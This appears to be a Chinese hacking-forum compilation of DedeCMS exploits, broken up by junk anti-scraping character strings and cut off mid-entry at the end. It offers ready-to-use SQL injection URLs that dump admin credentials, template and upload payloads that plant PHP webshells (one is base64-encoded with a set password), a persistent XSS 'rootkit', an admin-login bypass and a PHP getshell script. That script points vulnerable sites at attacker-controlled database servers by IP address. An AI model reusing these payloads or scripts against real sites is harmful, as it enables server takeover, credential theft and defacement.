|
|
; w6 T4 n/ T! w1 u+ ^* X! T
Dedecms 5.6 rss注入漏洞
9 j6 g; i6 [( k6 |8 m( X bhttp://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1
6 i0 \# K% ~% m0 _0 S5 k% u* S
. G- w1 d, ^' A2 l- R/ ^7 V- g/ J4 I8 J" N1 ]; s6 z+ l
5 Q+ N2 m8 d. J2 f, ~9 o& v! q
% `2 o" b `/ b6 q
2 d- l/ y0 l+ k
% @: a9 S) Q# ]. L1 z/ ~: M
7 g4 Z) F5 a8 }& V
Q- L; M: Z% v; V0 O7 E% _, ]5 yDedeCms v5.6 嵌入恶意代码执行漏洞
% x2 C# P" V# R注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}+ L. Z$ i# l: q. ~2 F
发表后查看或修改即可执行- f1 A5 p, S/ S" L% F
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
) c9 y/ Q" ?8 [( u1 ?1 D生成x.php 密码xiao,直接生成一句话。
' w5 _$ C$ @! Y" g' a2 M) P! E: |, j' M/ a2 l
8 S8 w ^: ^! v
0 D2 t0 @* X8 n4 p0 A( @. c, m: k, {6 |. V* c& N
$ y2 W4 `9 j U; ~; ^' L! U9 V1 m
( U" ~3 O& g, N) h% Q
& Z# c2 J! M5 Q8 \( I. M
7 }; S1 s) Y' {0 GDede 5.6 GBK SQL注入漏洞
Y; X+ @5 R' _: _" fhttp://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';, f4 [0 r- R6 p, I4 S; C
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe5 D, |* J/ Z1 k' p8 Y
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7
/ O4 o0 y7 t4 y# r" K# [+ y
; j$ C' g+ B6 I) C1 F1 o7 |+ u. p
. {2 \* x1 v5 A( t
0 c5 q% C; j9 @* k$ E3 f6 H0 f3 I" j6 n$ B( u9 n
, Z, m9 q8 x/ `- U
" d# D% B' H0 F
/ H5 u5 ^* @4 m. c& ^! x$ U
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
f+ w$ r4 t) X) J+ l6 n6 Q6 dhttp://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin` " d& s$ L/ c! Y) a2 Z I8 m
" O" @1 F$ K1 @/ i
9 l4 b9 x5 ~' \0 R* ~" q2 F2 j! }3 o. N( j9 H* S/ J4 f- z
3 K& s# U# r# ?+ ?0 g* g+ ^
3 U: B9 ]" u" V0 R" l/ ~0 ^) c/ P2 P! |: C, d
DEDECMS 全版本 gotopage变量XSS漏洞
K. Q: U* K+ q# P: S/ S1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。
( d0 p$ O! x! c4 G6 N6 dhttp://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="- L9 H+ d9 r$ v5 w
- ~/ U3 A0 x0 y
$ N: s+ b) `0 r6 z5 l& g0 X
2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。
# x& Z8 j3 L* N8 ]http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
8 M& E7 s' k. J3 _% k9 X6 t$ E( [& F1 G) _! x/ T3 ^
9 K+ D8 M7 v% W: a8 l6 y0 L( Lhttp://v57.demo.dedecms.com/dede/login.php
# b3 O `7 q/ x) T& l) a- F6 }- U$ a5 `8 Z& P/ F w
+ U) @9 Y" T- icolor=Red]DeDeCMS(织梦)变量覆盖getshell6 V1 P1 l# l( V+ ^9 F" K8 t7 F
#!usr/bin/php -w
. r0 \+ ?; z) e2 n* y3 C<?php, \1 ]. J8 O: @; W# h
error_reporting(E_ERROR);
) `5 p+ ^1 o+ c; w" I* _set_time_limit(0);
/ k' A* F1 F( ^' }4 |2 gprint_r('9 a; \# p2 a Q2 q n; D
DEDEcms Variable Coverage" e( A" W2 w9 R. E! X5 d4 @
Exploit Author: www.heixiaozi.comwww.webvul.com. y* @; v" c; c3 _# C' [
);
% Q, J' u7 K: ~echo "\r\n";3 u- z' c1 n- p: z M; t P
if($argv[2]==null){& s: {( l0 \5 o: k0 U
print_r('' e0 Z8 L* k4 U
+---------------------------------------------------------------------------+
# k7 G$ `9 V" K; o. X+ P* Q cUsage: php '.$argv[0].' url aid path! ~6 i" u- S" p. X
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
3 y2 c& K. p+ x' i+ u. G6 PExample: D. i" M/ q, A" s; ~! I* v0 R
php '.$argv[0].' www.site.com 1 old
! |0 j: O7 x+ @$ e% q1 g+---------------------------------------------------------------------------+/ X ~6 d' c6 X- Q# B! ?8 S
');+ F8 a9 `" p5 ]( Z, n& u
exit;
# p7 n, q" E3 c2 g}. J5 z5 [& @( g) Y# G5 `3 A2 h
$url=$argv[1];
2 z6 |, g- N3 S' O( @$aid=$argv[2];
3 l; U8 E+ u: t2 }$path=$argv[3];1 _% E$ c8 z7 g& U1 r* ~7 \
$exp=Getshell($url,$aid,$path);( o5 R7 a$ s9 M( R4 l
if (strpos($exp,"OK")>12){5 @" e! a7 j, ~5 B3 c
echo "* R4 w. G% _, @; t. { F# ~8 o
Exploit Success \n";
. m1 b1 z7 G+ x* R0 p( @if($aid==1)echo "
: Y- A( b/ G0 B5 H. ^2 bShell:".$url."/$path/data/cache/fuck.php\n" ; _- R; S3 V# O% J" K, A
5 e# N3 E# k7 M+ i$ W0 _) ?( j
9 m( u; O7 c$ C! u1 T% uif($aid==2)echo "' m6 X! |% |; @8 ]- I0 J9 X4 Q
Shell:".$url."/$path/fuck.php\n" ;) Q( M9 _, q2 E* a! n
$ {# Q' Z9 _; Q. n) p4 r
$ p, K8 w* G& L; l% lif($aid==3)echo "# O8 C9 o7 ]" z+ y
Shell:".$url."/$path/plus/fuck.php\n";+ s6 X2 I/ v6 X" V3 {/ ^# j6 G
' r8 Q4 c9 t) ^. }5 y/ V& R ]2 E o6 G
. i" k, `& P7 t- n3 M4 E
}else{
) P2 D# V- O2 ?( m% i' ~; ~echo "
8 i: s& R! w, M: JExploit Failed \n";
2 q0 s% P; \1 N* {5 K* Y}" c ]4 u# z4 B7 L' X2 Y \: T
function Getshell($url,$aid,$path){
# _' e6 z3 p4 y# J. G Z$id=$aid;
; i/ U0 z/ N$ ~3 l: ?$ e$host=$url;
$ `$ ]# Q# U4 ] D) K$port="80";
; ?9 `: ]; M- |4 T" i6 d9 i$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
5 N v' d5 x6 f) C2 M$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
2 y: B) Y% J2 A$ X1 @5 f$data .= "Host: ".$host."\r\n";
( p K0 H( ?4 x% I1 ~$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
. q" m- A% m/ m% @7 k4 }$ {$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";9 l: `* @6 ]. |$ O, y# l
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";+ N" \4 H$ r& o( O$ s
//$data .= "Accept-Encoding: gzip,deflate\r\n";
7 C3 N& v# h# p$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";" r. l8 k3 i- w0 `! W# @
$data .= "Connection: keep-alive\r\n";4 P7 ~! P' T' X: S' Z9 |7 U; {# M; O% W
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
) a) x. p: e" x1 G- v$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
0 _+ t6 p0 N/ i' g4 q9 I, e$data .= $content."\r\n";# F3 A4 i/ e. w
$ock=fsockopen($host,$port);
" n) z7 y! v9 i. p& J5 [# yif (!$ock) {
# Z8 n, [% V* z- O" r' ~echo ", _4 _. u% ?, E
No response from ".$host."\n";
' O i* G% C, r+ b; B}( L; q, Q4 h( P( }1 v9 d z0 n
fwrite($ock,$data);) f" w" L4 q. T( D1 j
while (!feof($ock)) {* \! ]# h9 p; J3 I! S# O
$exp=fgets($ock, 1024);
( S. ^! S. \. Wreturn $exp;
- U" N- _/ ]1 G! O! |}
3 x9 d3 F+ t* E$ e! i7 \' Y8 ~: b}
7 W9 t5 Z$ q1 g; `7 }* @' [$ N% x1 l5 V. w" a' ^6 k O" U- _
$ m) c, Y& ?6 z
?>
* r+ }- a4 U. y5 g8 l6 G3 b; Z( f# H) e5 A
2 d* x# [3 o# u7 w. i) K. G |& v8 j7 m
5 \" t! c. a! S; }
& F: U7 X; h- E9 N& u7 [
I) ~: ?: `) C& Y2 L1 y; n' S, R2 R1 m9 I' z
( c- m' _! @' \ j! ?0 c
& e2 d, w8 M$ L$ Z; i6 F* A# ], \! |9 @' J2 D
DedeCms v5.6-5.7 越权访问漏洞(直接进入后台)
+ D7 j( N( R6 i1 G5 a bhttp://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
2 x" G* f2 R( o7 r' ` J( l( X1 N
; Q% h8 b! ?7 b& ^4 G6 W7 A2 p: y) z8 I
把上面validate=dcug改为当前的验证码,即可直接进入网站后台1 ]% K) G7 Z" L+ Z0 x6 r5 C
4 D2 K" d7 x6 c* z- p
& G+ l7 f7 g( m4 a- d4 ]0 _此漏洞的前提是必须得到后台路径才能实现# F- _- [* q( r
8 j4 ]' m) y1 h3 ^( |6 T5 Z' ^) X
p( H; t5 ?+ o: J
3 v! B$ Z0 U2 M! g: S
& Z" ]( {0 S3 h4 b
! [' i2 V9 Q+ |% z+ ]* \. `' o3 I
) x( v% J; J% {; R3 V" S9 i0 F
w" C4 \4 ] a, |& e1 \# l. k6 H8 n5 f7 O+ v& n3 K# C/ S
2 v( O: a! B* z! ADedecms织梦 标签远程文件写入漏洞
" V9 O) P5 p: s) s7 J1 A2 M+ \前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');, j9 ~2 k5 t: h9 S8 s- f0 F
5 h v4 K+ \* q" Z; b4 U9 I7 V* }# Y' w! |- e0 ~- ~
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。 $ V$ k! s! ? d1 g4 Y& d
<form action="" method="post" name="QuickSearch" id="QuickSearch">
9 s1 I2 m% N, p: I/ }0 v, f5 z; Y<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
' x/ k2 C/ _( {% l' K0 V$ O<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
- [5 Y, R: G& J% j& I<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />9 n) r) F c' V9 i
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />' a' r5 G/ o: i4 s$ |
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />% H/ G. C% r+ M) o) w
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />$ e% c# [0 L& d3 B) t
<input type="text" value="true" name="nocache" style="width:400">
% T) q1 T" ]8 u0 K# M5 B/ x2 H<input type="submit" value="提交" name="QuickSearchBtn"><br />; \0 w t0 D7 I8 T$ n* C
</form>
4 ]' m" h5 [6 s; S* ^; u1 H<script>
4 r" j3 y/ s: S* `& jfunction addaction()
. J: Q2 j; n* A/ [! D7 Q- s{# k9 o- Z v7 v; g( b/ Y1 X
document.QuickSearch.action=document.QuickSearch.doaction.value;
9 D) I- P5 \0 i0 E! T6 s' x}
& V! c7 [/ I" k( U5 m</script>
" w7 P, @/ p G0 ~) X% l/ I( N8 @5 u- X5 N
9 v/ ~8 M; I7 h# N4 q; w
- P7 e9 \6 N' P# O' M8 j( |) M; U2 K2 r- y, t
, T! x5 ^/ b( j# y/ N
$ G& F$ i0 n$ l/ Q' e8 D
5 \5 t/ i1 v/ z# L2 h c! @) C8 t8 D: G) P
/ o' {8 j/ K5 ]
5 b9 w8 s1 E' q( Z3 VDedeCms v5.6 嵌入恶意代码执行漏洞/ R# K8 D% `+ x' W. C% X7 s. E
注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行: A/ g5 E; Q( \: k2 i/ w' t! S( k
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
, P6 D* J7 b" D) \) z4 J生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得& z' {+ F( R9 T# ?# k# ?& b8 u
Dedecms <= V5.6 Final模板执行漏洞
, p: q( d T. Q注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:
( U% I/ z. [8 w1 m7 v* Xuploads/userup/2/12OMX04-15A.jpg
' R ^$ e; [6 N+ t( F5 J) M6 I% a" s2 V* x! j( K
2 J5 D5 m) d( P( S+ K! U) b9 v7 u模板内容是(如果限制图片格式,加gif89a):
: x7 |1 z( y6 `0 t- A5 f{dede:name runphp='yes'}
# O7 b) G4 V/ t, x8 h( Q$fp = @fopen("1.php", 'a');
$ b: r+ W4 _" R" y, c- h: l@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");& X. W4 l- c$ N* y- n4 C( d* q# a& [
@fclose($fp);
' a' [$ P x* d5 J. o/ g: s+ W{/dede:name}+ A4 T0 h: T8 S8 K8 J! J/ _+ s
2 修改刚刚发表的文章,查看源文件,构造一个表单:1 v0 f' K0 V' }& m
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
+ @2 C: l$ ~ \& H t: u( [<input type="hidden" name="dopost" value="save" />
L# I% V5 `/ P: h l<input type="hidden" name="aid" value="2" />
- ?) z" O$ v7 g6 m/ @<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />4 M4 `$ Y2 Y9 A- L# u
<input type="hidden" name="channelid" value="1" />
3 g( I+ P* S- z- A) B& r<input type="hidden" name="oldlitpic" value="" />- I- ^0 \6 l5 @0 C% ?
<input type="hidden" name="sortrank" value="1275972263" />1 p. w: O* C# q+ ^
Y, g n, M$ S' R$ \$ y+ W- k1 _- X5 Q8 K7 `( Q7 L
<div id="mainCp">
- u$ ?' D' W/ y4 R% n<h3 class="meTitle"><strong>修改文章</strong></h3>+ F+ x6 @* n" Q7 `2 X( M8 t
; Y* ~% m6 |1 P" j6 T4 e
! w3 `+ p- m4 H7 N& R<div class="postForm">
; A) p1 v* w$ U1 i& k. v<label>标题:</label>* I4 Y( W4 ]" }5 m. _* J
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>% g) J! B# [" z# G& J& }" z
1 ^) M: K; b4 t7 f1 D5 n3 p- U! \& y) g2 P2 q
<label>标签TAG:</label>
8 @' R" {+ w& S3 Y<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)
5 c2 {6 \. m; @* r3 `
4 Y; E+ T4 ^) B
- N8 T' Z& m- E3 \: f) M<label>作者:</label>; v! N5 U$ D4 y+ r7 a( ~
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>0 ]9 s n. P, g( g G
3 Z0 Q4 d; F1 W: A# ]# s; `* K
1 F$ r Z8 o* r+ k: Q
<label>隶属栏目:</label>
" ]& y; ^( ]* D" P- @<select name='typeid' size='1'>3 _" I$ _4 X; j1 v- v0 ^' s7 J
<option value='1' class='option3' selected=''>测试栏目</option>$ k3 o9 ]+ W7 x: G7 N1 ^/ i
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
7 O/ P, I; W' V7 O5 D7 w, u9 P) d: T4 R3 Q
/ E. T# }) v; C- a7 P$ ~<label>我的分类:</label>: k9 Y4 i9 i6 |3 g
<select name='mtypesid' size='1'>: J: |* a. z b
<option value='0' selected>请选择分类...</option>
7 G$ @' Z/ q7 F) Q- {' G/ s2 v<option value='1' class='option3' selected>hahahha</option>8 X) v0 A. }% m2 M% u4 _* U
</select>9 Z) {2 Z. `0 \3 g
9 p+ O( I! O6 D; R( k# y" k" s" M
b$ y* G9 d7 d; Z- ]7 _<label>信息摘要:</label>
# _+ T: ~) T0 [2 K+ t `7 s- b- h<textarea name="description" id="description">1111111</textarea>% h) `2 r* Y7 [" e1 F( Y0 y6 f6 I
(内容的简要说明). O, T3 }1 v9 o* M5 h. U/ P
& Y1 C" `8 ?( C( N, U ^
- u3 y2 a( ~) L7 {8 u0 ~<label>缩略图:</label>, L2 s7 P: r8 }6 M3 U
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
" _' o8 i+ e0 E) l3 F
$ s+ g# U8 G4 d6 E. C% a/ [$ s1 [" Z" o, z/ H" A
<input type='text' name='templet'0 J- m3 q/ \2 u2 e9 ^# l
value="../ uploads/userup/2/12OMX04-15A.jpg">9 f: ?- B2 w# z, I. d" }
<input type='text' name='dede_addonfields'1 Y _# v9 H! Z$ N0 K
value="templet,htmltext;">(这里构造)& V: n: `9 n: [
</div>
, h! V- \9 W( y4 k* D9 _
* ~$ I7 j' s/ K n1 \! w8 n8 P' s. X4 t& Q( [
<!-- 表单操作区域 -->/ N( a3 F- e$ ?( }/ X+ a
<h3 class="meTitle">详细内容</h3>. O# C: s! g! C$ T, m/ m7 [: D- I
6 G! |, q9 l8 P3 j/ B" [5 g5 v! ~$ |3 x! a+ w' `1 y$ \" g
<div class="contentShow postForm">; i6 k" d7 l) I2 J5 H q' d2 E v
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>$ d- d# j5 F1 j2 C5 W5 z4 I- B
* H0 G- f* q" {$ F j" \9 v/ @
. r) T7 T4 @4 m1 h
<label>验证码:</label>
& N" e0 _$ a- v& j<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />1 s9 \5 s8 I4 t& b7 G& y
<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
- e, ~' `2 v! W6 I1 h
b" y, t) g- Q8 c4 s& B
, {% w$ R/ [3 D<button class="button2" type="submit">提交</button>8 C9 j. N b& q l$ B3 i! g% m' V
<button class="button2 ml10" type="reset">重置</button>5 c# A ?- ]; _' H h% _8 l
</div>% V8 Z% p, X2 Q
, S$ ^4 d: v/ t6 L9 m. a# a& p% V% I& ?" z
</div>
2 }9 q) L3 X4 V$ m) J! D* [/ Q7 U* h
& R7 U' l( d' Q5 K5 F1 A4 v</form>
! A# K# k$ \3 _+ V# Z) o
) N- J1 K5 A n, v2 f& `5 q1 v( V! \2 r8 X+ o4 y
提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:7 A9 y M7 _# _3 p; M# p' l! ?- M
假设刚刚修改的文章的aid为2,则我们只需要访问:8 D' _. i* y4 J% D- u- J
http://127.0.0.1/dede/plus/view.php?aid=2: s$ S# S6 N- S- L
即可以在plus目录下生成webshell:1.php2 _6 I$ P9 Q6 k" Z( j5 U
4 ?5 n8 z# F6 @
6 K3 r( g: Z3 t7 ~* z e0 g) c# L, m5 i# k0 i0 d
- x e$ K& R3 u
* b& @9 r: ] f+ Q
9 N8 R: D. _' G# t& G1 c2 [- X2 j. ^* ?0 w+ H5 e. A, [
. j8 d- e% Y0 n* z
) }6 S! Z; z @5 Y
; R0 V2 D9 w7 Y) T5 R
8 x6 \" n* y! ~8 @
: I* @/ }9 o: C, z, B
DEDECMS网站管理系统Get Shell漏洞(5.3/5.6) X: g6 e+ {: b& u0 u$ _; T% i
Gif89a{dede:field name='toby57' runphp='yes'}
7 j; x' w4 }6 o, i3 Rphpinfo();
( w* k4 ~* i7 s% h: H M& u U{/dede:field}; N! L" P8 i: n7 r% B
保存为1.gif) o" S7 X# U6 g) K! E8 q' @
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" "> 5 f3 j6 j" [$ ?$ O, ?% K1 ^. N
<input type="hidden" name="aid" value="7" />
1 |4 B4 K# O* S" w<input type="hidden" name="mediatype" value="1" /> 3 P' H* ~' X0 b: X: ^
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br>
) E/ y: J4 I0 H- ]* k* y( h<input type="hidden" name="dopost" value="save" />
. M2 ]$ u0 B& F2 `# i, |( \<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/> # k% e! c" ~" W, p6 c
<input name="addonfile" type="file" id="addonfile"/> 6 J. ~9 F( x: O @+ N- C
<button class="button2" type="submit" >更改</button>
6 b$ S1 @7 z6 |( p/ {</form> / y; [9 J: ^8 M4 z2 |2 [4 T
, t& a# }( v* }" G3 {' j3 p5 U( H
- ~. X0 r9 t7 j6 f k4 ? l$ v构造如上表单,上传后图片保存为/uploads/userup/3/1.gif
* E1 o1 u& T% @" l8 u发表文章,然后构造修改表单如下:+ |& G' C5 C" ]( k- I# Z
% I) A2 R4 z; C Y4 v* {2 N0 C, U @" z2 [& v( l% X8 T3 V
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
6 ^9 V6 T3 s7 _) B2 \4 `<input type="hidden" name="dopost" value="save" /> # _0 E, }( C9 G2 q& C* f
<input type="hidden" name="aid" value="2" />
5 X: L) i7 E- n4 Y N/ L/ N<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
: j' q4 l6 `$ d& {" \" y2 V7 f<input type="hidden" name="channelid" value="1" />
# {5 L; F, d5 l/ V% T& R( M<input type="hidden" name="oldlitpic" value="" /> 8 \, r' N# l0 c* j
<input type="hidden" name="sortrank" value="1282049150" /> " K5 k8 w9 u6 k. r% f/ e
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/> , e9 D. @% ?6 D, s' U- |4 m5 v
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
( _4 Q) L4 F/ h% E/ g<select name='typeid' size='1'>
7 s) A* S+ s! |3 b/ u<option value='1' class='option3' selected=''>Test</option>
$ h* V: G4 @! T5 h<select name='mtypesid' size='1'> - K& \: t% @) _; A; _
<option value='0' selected>请选择分类...</option> 7 u+ M* \. ^, D4 h r
<option value='1' class='option3' selected>aa</option></select> - M0 v7 R1 |. |+ F) u
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea> * J' @8 L) U) B% |/ Z5 B
<input type='hidden' name='dede_addonfields' value="templet">
; C7 u9 o! ?+ F7 M5 k<input type='hidden' name='templet' value="../uploads/userup/3/1.gif"> $ @$ z2 [4 {2 u& {
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
/ T9 H; g5 \/ C8 v- b% |<button class="button2" type="submit">提交</button>
8 Y6 R& x9 c1 a& ~</form>
, ^6 K7 g1 p- e4 S
) I( b2 [* a+ n q2 x6 A6 `% d) z9 d+ |. u
7 _# @, j/ U$ U# K% e
4 r t: K! n3 x/ I7 T$ f4 q8 I
5 x6 b& K X2 ^8 k, x0 N: C+ z4 O% e1 N7 A0 n! r# C
; Q! g1 j) O3 i, C! I' c$ r) e0 k0 @% ^# T B
7 ^" U) G- f( S+ @. V' r0 p" n6 _5 r7 H8 m, ]% v
( ~' N0 w, N3 I: [
% }6 B7 i2 C- `5 e织梦(Dedecms)V5.6 远程文件删除漏洞
1 K* M7 D/ |2 G& i& I) O: C5 Rhttp://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif2 \$ |' B! M5 U' s' {$ V O* f8 `
6 W$ k# B4 [' M! `
8 W3 @" U8 R4 A4 w$ E# e! N
/ M, \) c6 a6 s' ~( q+ \+ c. x# g9 ^& L
* Z: s% }/ ?* Y. Y Y+ s
0 W+ E" o2 }+ A
" i9 M. \. a: J9 x+ r t& s) R
. g3 K5 S5 }2 ^ ~. N# j$ F0 H
; y" N$ {8 o- Q1 M- K. H5 k. h0 T# y% p/ Y- F1 h
织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞 ' _, L: Z" B2 ^, ^' X
http://www.test.com/plus/carbuya ... urn&code=../../
* j1 P: ]; y [% Z* \' v# r7 C' R' `# C% C, |
5 U, O: `2 ^) K9 g; V7 X: s( D7 x# T9 G0 A
; i8 Y( `; ]. b; o) G
* u0 ^" A" X n! A6 l1 A! W' {! \$ l. I
8 J1 y6 q; R8 B8 C/ c1 z
1 {. b7 I! r. R
. b \0 ^0 t3 w3 e1 ~2 E0 C# L7 f2 I1 I
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞 # U: ?# d5 z/ G4 I- I) x+ D
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`9 f7 v8 B7 g7 h# M& x# y9 u8 v
密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5
, P6 x+ o6 ?$ ?. J L8 w
2 J; C( c1 g% Q5 R6 D# @0 I3 C& c) Q& F6 Z
) u! ^, W* _) c1 U. G3 O
( _8 f9 G0 n2 e6 F w F) v* F" l" ]: [* M7 ?, r5 L r9 c
* }) x' W1 x4 g
* S1 r7 G; g) }( ^% {8 P |4 c
/ O% N+ B1 i/ {" d5 s% M
2 m6 B. s) Z5 [- F C
8 m" H( f. v9 S" a$ j% @织梦(Dedecms) 5.1 feedback_js.php 注入漏洞3 s4 C5 O+ v I2 y, O
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
* F: Y3 E" P0 W0 D# Z! h+ N' h+ a9 p' \/ R7 u6 b! x
$ c3 a) M/ y: G) k6 Z4 W9 f
1 W5 \/ M! B8 W, e) F9 g( w3 t6 E1 P9 p% L; d) {2 V
N, p: s4 P. p/ K; |& g' }( N) T; b% ?6 x$ E) ]
- N9 {0 _' \4 T" ~
' s- h& @% y+ X {) f4 `3 Z3 c1 @) k! N; T& `; t
' _& c* O& E4 [
织梦(Dedecms)select_soft_post.php页面变量未初始漏洞3 u) h- P4 s2 p `! b' k
<html>
( z0 \0 y" r( f/ ^7 v2 [<head>
